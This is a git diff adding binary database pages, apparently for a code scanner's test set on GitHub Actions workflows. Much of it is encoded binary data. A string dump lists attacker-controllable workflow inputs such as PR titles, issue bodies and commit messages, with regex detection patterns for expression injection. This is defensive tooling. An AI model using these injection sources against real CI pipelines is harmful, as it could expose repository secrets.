z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..df3045a1ff5f4f01ad1cca4e97dbff096c69683a GIT binary patch literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..cb4291b6b3b65463c7b9660f099668c0cfc4fe35 GIT binary patch literal 16384 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 Bc#Z%7 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 000000000000..eec9231ab076 --- /dev/null +++ b/db/db-yaml/default/strings/0/pageDump/page-000000000 @@ -0,0 +1,2 @@ +tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language }}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description }}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... _reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input 